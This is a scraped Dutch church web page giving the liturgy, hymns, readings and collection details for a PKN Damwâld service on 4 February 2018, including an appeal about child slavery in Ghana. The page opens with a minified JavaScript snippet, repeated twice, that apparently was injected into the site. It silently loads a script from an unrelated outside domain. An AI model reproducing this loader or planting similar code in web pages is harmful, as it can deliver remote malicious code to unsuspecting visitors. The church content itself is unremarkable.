;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 4 februari 2018 14:00 uur - PKN Damwâld
zondag 4 februari 2018
14:00 uur

Kerkdienst zondag 4 februari 2018 14:00 uur

Informatie

Voorganger:Ds. R. de Pee, Feanwâlden
Organist:Jelte Cuperus
Liturgie
Lied voor de dienst Elb 435
Welkom en mededelingen
Intochtslied Ps 89 : 1 en 9
Stil gebed , Votum en Groet
Aanvangstekst .
We zingen: Gez. 254 : 1, 2, 3 en 4
Gebed
We zingen: Gez. 319 : 1 en 2
Thema van de dienst
We zingen: ELB 275 : 3 en 4
We lezen: PSALM 46
We zingen: Ps. 46 : 3
We lezen: JOHANNES 3 : 1 – 13
We zingen: Gez. 293 : 1 en 3
Verkondiging .
We zingen: Gez. 476 : 1 en 4
Dankzegging en Voorbede
Collecte
Geloofsbelijdenis .
We zingen: Ps. 121 : 3 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Gezondheidszorg voor armen
Tweede collecte: Kerk
Uitganscollecte: Werelddiaconaat

In Ghana doen kinderen, onder dwang, gevaarlijk werk in de visserij op het Voltameer. Kinderen, vooral jongens, worden meegelokt of meegenomen en op kleine eilandjes in het meer, dat vier keer zo groot is als Nederland, vastgehouden door hun slavenmeesters. Er is geen enkele mogelijkheid om aan de grillen van hun meesters te ontsnappen. Partnerorganisatie Challenging Heights spoort deze kinderen op, bevrijdt hen en vangt de kinderen tijdelijk op. In deze tijdelijke opvang worden kinderen met intensieve psychologische hulp en onderwijs voorbereid op een terugkeer naar hun eigen gezin en dorp. Met de collecteopbrengst wil Challenging Heights in 2018 realiseren dat 25 bevrijde kinderen onderwijs krijgen en begeleiding bij hun terugkeer naar huis